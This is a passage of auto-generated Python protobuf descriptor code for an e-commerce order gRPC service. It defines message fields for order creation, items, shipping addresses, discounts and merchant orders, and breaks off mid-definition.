\x03(\x0b\x32\x10.order.OrderItem\x12$\n\x07\x61\x64\x64ress\x18\x17 \x01(\x0b\x32\x13.order.OrderAddress\x12\x14\n\x0cpayment_type\x18\x18 \x01(\t\x12\x13\n\x0b\x63ost_amount\x18\x19 \x01(\x03\x12\x15\n\rbusiness_code\x18\x1a \x01(\t\x12\x15\n\rbusiness_type\x18\x1b \x01(\t\x12(\n\x06labels\x18\x1c \x03(\x0b\x32\x18.order.Order.LabelsEntry\x12\x11\n\tcancel_at\x18\x1d \x01(\x03\x12\x15\n\rreturn_remark\x18\x1e \x01(\t\x12\x11\n\treturn_at\x18\x1f \x01(\x03\x12-\n\x0bsettlements\x18 \x03(\x0b\x32\x18.order.OrderSettlementV2\x12\x18\n\x10merchant_user_id\x18! \x01(\t\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"\xa2\x06\n\tOrderItem\x12\x0f\n\x07item_id\x18\x0c \x01(\t\x12\x0e\n\x06spu_id\x18\x01 \x01(\t\x12\x0e\n\x06sku_id\x18\x02 \x01(\t\x12\r\n\x05title\x18\x03 \x01(\t\x12\r\n\x05image\x18\x04 \x01(\t\x12/\n\x08sku_prop\x18\x05 \x03(\x0b\x32\x1d.order.OrderItem.SkuPropEntry\x12\x17\n\x0foriginal_amount\x18\x06 \x01(\x03\x12\x13\n\x0bsale_amount\x18\x07 \x01(\x03\x12\x17\n\x0f\x64iscount_amount\x18\x08 \x01(\x03\x12\x14\n\x0ctotal_amount\x18\t \x01(\x03\x12\x10\n\x08\x63urrency\x18\n \x01(\t\x12\x10\n\x08quantity\x18\x0b \x01(\x03\x12\x13\n\x0b\x63ost_amount\x18\x0e \x01(\x03\x12\x10\n\x08store_id\x18\x0f \x01(\t\x12\x14\n\x0cproduct_type\x18\x10 \x01(\t\x12\x15\n\rbusiness_type\x18\x11 \x01(\t\x12\x13\n\x0bsupplier_id\x18\x12 \x01(\t\x12\x1c\n\x10user_rebate_rate\x18\x13 \x01(\x01\x42\x02\x18\x01\x12\x1b\n\x13\x63hannel_rebate_rate\x18\x14 \x01(\x01\x12\x15\n\rbind_item_ids\x18\x15 \x03(\t\x12,\n\x06labels\x18\x16 \x03(\x0b\x32\x1c.order.OrderItem.LabelsEntry\x12\x13\n\x0b\x63\x61tegory_id\x18\x17 \x01(\t\x12 \n\x18user_rebate_amount_limit\x18\x18 \x01(\x03\x12*\n\x1emerchant_apportion_rebate_rate\x18\x19 \x01(\x01\x42\x02\x18\x01\x12*\n\x1eplatform_apportion_rebate_rate\x18\x1a \x01(\x01\x42\x02\x18\x01\x12=\n\x15gradient_rebate_rates\x18\x1b \x03(\x0b\x32\x1e.settlement.GradientRebateRate\x1a.\n\x0cSkuPropEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"\xc3\x01\n\x0cOrderAddress\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06mobile\x18\x02 \x01(\t\x12\x0f\n\x07\x63ountry\x18\x03 \x01(\t\x12\r\n\x05state\x18\x04 \x01(\t\x12\x0c\n\x04\x63ity\x18\x05 \x01(\t\x12\x10\n\x08\x64istrict\x18\x06 \x01(\t\x12\x0e\n\x06\x64\x65tail\x18\x07 \x01(\t\x12\x10\n\x08postcode\x18\x08 \x01(\t\x12\r\n\x05\x65mail\x18\t \x01(\t\x12\x0c\n\x04ward\x18\n \x01(\t\x12\x16\n\x0erecharge_phone\x18\x0b \x01(\t\"\xba\x01\n\x12OrderUpdateContent\x12\x15\n\rbusiness_code\x18\x01 \x01(\t\x12\x10\n\x08order_id\x18\x02 \x01(\t\x12\x0f\n\x07user_id\x18\x03 \x01(\t\x12\x10\n\x08username\x18\x04 \x01(\t\x12\x0e\n\x06\x61\x63tion\x18\x05 \x01(\t\x12\x35\n\raction_params\x18\x06 \x01(\x0b\x32\x1e.order.OrderUpdateActionParams\x12\x11\n\tuser_type\x18\x07 \x01(\t\"\xb1\x03\n\x17OrderUpdateActionParams\x12\x15\n\rreview_method\x18\x01 \x01(\t\x12\x15\n\rreview_remark\x18\x02 \x01(\t\x12\x15\n\rcancel_reason\x18\x03 \x01(\t\x12\x17\n\x0fplatform_remark\x18\x04 \x01(\t\x12\x15\n\rseller_remark\x18\x05 \x01(\t\x12\x12\n\nstr_param1\x18\x06 \x01(\t\x12\x12\n\nint_param1\x18\x07 \x01(\x03\x12\x15\n\rreturn_remark\x18\x08 \x01(\t\x12\x30\n\x08packages\x18\t \x03(\x0b\x32\x1e.order.OrderPackageUpdateParam\x12:\n\x06labels\x18\n \x03(\x0b\x32*.order.OrderUpdateActionParams.LabelsEntry\x12/\n\x07\x61\x64\x64ress\x18\x0b \x01(\x0b\x32\x1e.order.OrderAddressUpdateParam\x12\x14\n\x0ctotal_amount\x18\x0c \x01(\x03\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"^\n\x17OrderPackageUpdateParam\x12\x10\n\x08item_ids\x18\x01 \x03(\t\x12\x1c\n\x14logistics_company_id\x18\x02 \x01(\t\x12\x13\n\x0btracking_no\x18\x03 \x01(\t\"\xce\x01\n\x17OrderAddressUpdateParam\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06mobile\x18\x02 \x01(\t\x12\x0f\n\x07\x63ountry\x18\x03 \x01(\t\x12\r\n\x05state\x18\x04 \x01(\t\x12\x0c\n\x04\x63ity\x18\x05 \x01(\t\x12\x10\n\x08\x64istrict\x18\x06 \x01(\t\x12\x0c\n\x04ward\x18\x07 \x01(\t\x12\x0e\n\x06\x64\x65tail\x18\x08 \x01(\t\x12\x10\n\x08postcode\x18\t \x01(\t\x12\r\n\x05\x65mail\x18\n \x01(\t\x12\x16\n\x0erecharge_phone\x18\x0b \x01(\tB\x19Z\x17\x61pp/protocol/grpc/orderb\x06proto3'
,
dependencies=[order__review__pb2.DESCRIPTOR,order__settlement__pb2.DESCRIPTOR,code__pb2.DESCRIPTOR,settlement__pb2.DESCRIPTOR,])
_ORDERCREATEREQ = _descriptor.Descriptor(
name='OrderCreateReq',
full_name='order.OrderCreateReq',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='user_id', full_name='order.OrderCreateReq.user_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='username', full_name='order.OrderCreateReq.username', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='business_code', full_name='order.OrderCreateReq.business_code', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='orders', full_name='order.OrderCreateReq.orders', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=96,
serialized_end=210,
)
_ORDERCREATEINFO_LABELSENTRY = _descriptor.Descriptor(
name='LabelsEntry',
full_name='order.OrderCreateInfo.LabelsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='order.OrderCreateInfo.LabelsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='order.OrderCreateInfo.LabelsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=535,
serialized_end=580,
)
_ORDERCREATEINFO = _descriptor.Descriptor(
name='OrderCreateInfo',
full_name='order.OrderCreateInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='country', full_name='order.OrderCreateInfo.country', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_type', full_name='order.OrderCreateInfo.order_type', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_items', full_name='order.OrderCreateInfo.order_items', index=2,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='logistics_amount', full_name='order.OrderCreateInfo.logistics_amount', index=3,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='payment_method', full_name='order.OrderCreateInfo.payment_method', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='address', full_name='order.OrderCreateInfo.address', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='labels', full_name='order.OrderCreateInfo.labels', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='remark', full_name='order.OrderCreateInfo.remark', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='discounts', full_name='order.OrderCreateInfo.discounts', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_ORDERCREATEINFO_LABELSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=213,
serialized_end=580,
)
_ORDERITEMCREATEINFO = _descriptor.Descriptor(
name='OrderItemCreateInfo',
full_name='order.OrderItemCreateInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='item_id', full_name='order.OrderItemCreateInfo.item_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='spu_id', full_name='order.OrderItemCreateInfo.spu_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sku_id', full_name='order.OrderItemCreateInfo.sku_id', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bind_item_ids', full_name='order.OrderItemCreateInfo.bind_item_ids', index=3,
number=4, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quantity', full_name='order.OrderItemCreateInfo.quantity', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=582,
serialized_end=693,
)
_ORDERADDRESSCREATEINFO = _descriptor.Descriptor(
name='OrderAddressCreateInfo',
full_name='order.OrderAddressCreateInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='order.OrderAddressCreateInfo.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile', full_name='order.OrderAddressCreateInfo.mobile', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='country', full_name='order.OrderAddressCreateInfo.country', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='state', full_name='order.OrderAddressCreateInfo.state', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='city', full_name='order.OrderAddressCreateInfo.city', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='district', full_name='order.OrderAddressCreateInfo.district', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='detail', full_name='order.OrderAddressCreateInfo.detail', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='postcode', full_name='order.OrderAddressCreateInfo.postcode', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='email', full_name='order.OrderAddressCreateInfo.email', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ward', full_name='order.OrderAddressCreateInfo.ward', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='recharge_phone', full_name='order.OrderAddressCreateInfo.recharge_phone', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=696,
serialized_end=901,
)
_ORDERDISCOUNTCREATEINFO = _descriptor.Descriptor(
name='OrderDiscountCreateInfo',
full_name='order.OrderDiscountCreateInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='discount_type', full_name='order.OrderDiscountCreateInfo.discount_type', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='discount_info', full_name='order.OrderDiscountCreateInfo.discount_info', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=903,
serialized_end=1000,
)
_ORDERDISCOUNTINFO = _descriptor.Descriptor(
name='OrderDiscountInfo',
full_name='order.OrderDiscountInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='amount', full_name='order.OrderDiscountInfo.amount', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='currency', full_name='order.OrderDiscountInfo.currency', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='order.OrderDiscountInfo.value', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1002,
serialized_end=1070,
)
_ORDERLISTRESULT = _descriptor.Descriptor(
name='OrderListResult',
full_name='order.OrderListResult',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='data', full_name='order.OrderListResult.data', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total', full_name='order.OrderListResult.total', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='code', full_name='order.OrderListResult.code', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='msg', full_name='order.OrderListResult.msg', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1072,
serialized_end=1171,
)
_ORDERCREATERESULT = _descriptor.Descriptor(
name='OrderCreateResult',
full_name='order.OrderCreateResult',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='orders', full_name='order.OrderCreateResult.orders', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='errors', full_name='order.OrderCreateResult.errors', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='code', full_name='order.OrderCreateResult.code', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='msg', full_name='order.OrderCreateResult.msg', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1174,
serialized_end=1303,
)
_CREATEORDERERROR = _descriptor.Descriptor(
name='CreateOrderError',
full_name='order.CreateOrderError',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='index', full_name='order.CreateOrderError.index', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='code', full_name='order.CreateOrderError.code', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='msg', full_name='order.CreateOrderError.msg', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1305,
serialized_end=1365,
)
_MERCHANTORDERCREATEREQ_LABELSENTRY = _descriptor.Descriptor(
name='LabelsEntry',
full_name='order.MerchantOrderCreateReq.LabelsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='order.MerchantOrderCreateReq.LabelsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='order.MerchantOrderCreateReq.LabelsEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'8\001',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=535,
serialized_end=580,
)
_MERCHANTORDERCREATEREQ = _descriptor.Descriptor(
name='MerchantOrderCreateReq',
full_name='order.MerchantOrderCreateReq',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='customer_user_id', full_name='order.MerchantOrderCreateReq.customer_user_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='merchant_user_id', full_name='order.MerchantOrderCreateReq.merchant_user_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='business_code', full_name='order.MerchantOrderCreateReq.business_code', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='store_id', full_name='order.MerchantOrderCreateReq.store_id', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='country', full_name='order.MerchantOrderCreateReq.country', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='order_type', full_name='order.MerchantOrderCreateReq.order_type', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='total_amount', full_name='order.MerchantOrderCreateReq.total_amount', index=6,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='remark', full_name='order.MerchantOrderCreateReq.remark', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
